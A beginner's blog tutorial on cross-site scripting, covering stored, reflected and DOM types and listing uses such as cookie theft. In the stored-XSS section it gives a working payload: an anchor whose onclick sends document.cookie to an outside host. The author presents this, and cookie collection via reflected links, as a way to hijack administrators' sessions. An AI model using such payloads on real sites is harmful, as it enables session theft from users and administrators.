Its been quite some time, i have been learning XSS. Now that i know little bit of it, I decided to make tutorials for that.Keeping in mind the N00b i am at this currently, this tutorial is only for beginners.
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007.
Simply ‘XSS’ also known as ‘CSS’ (Cross Site Scripting, Easily confused with ‘Cascading Style Sheets’) is a very common vulnerability found in Web Applications, ‘XSS’ allows the attacker to inject malicious code , the reason of that is the developer trusts user inputs, or mis filtering issues ,then send back user input data to the client browser so the malicious code will execute.(Courtesy: WikiPedia)
What Can you do with it ?
- Chang Settings
- Advertise Unethically
- Steal Cookies
- Steal Form Tokens to make CSRF Easier
- And more , you have to be creative to exploit XSS.
Types of XSS
- Persistent (Stored) XSS – Attack is stored on the website,s server
- Non Persistent (reflect) XSS – User has to go through a special link to be exposed
- DOM-based XSS – Problem exists within the client-side script
Wikiepedia: A persistent cross-zone scripting vulnerability coupled with a computer worm allowed execution of arbitrary code and listing of file system contents via a QuickTime movie on MySpace.
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on “normal” pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read.
In Login forms the attacker can login using the following code
<a href=# onclick="document.location='http://g33kdom.net/xss.php?c='+escape(document.cookie);">Ashish</a>
So this code will show the Admin of the particular site my Name- ‘Ashish’ and when he clicks it his Cookie session will be stored on my sister site: g33kdom.net
After getting the cookie you can do anything which i have shown in this video
NON- Persistent(Reflected) XSS
The non-persistent (or reflected) cross-site scripting vulnerability is by far the most common type.These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the request.
A site containing a search field does not have the proper input sanitizing and be used to exploit this XSS
Sitting on the other end, at the web server, you will be receiving hits where after a double space is the users cookie. You might strike lucky if an administrator clicks the link, allowing you to steal their sessionID and hijack the session.
DOM Coming soon…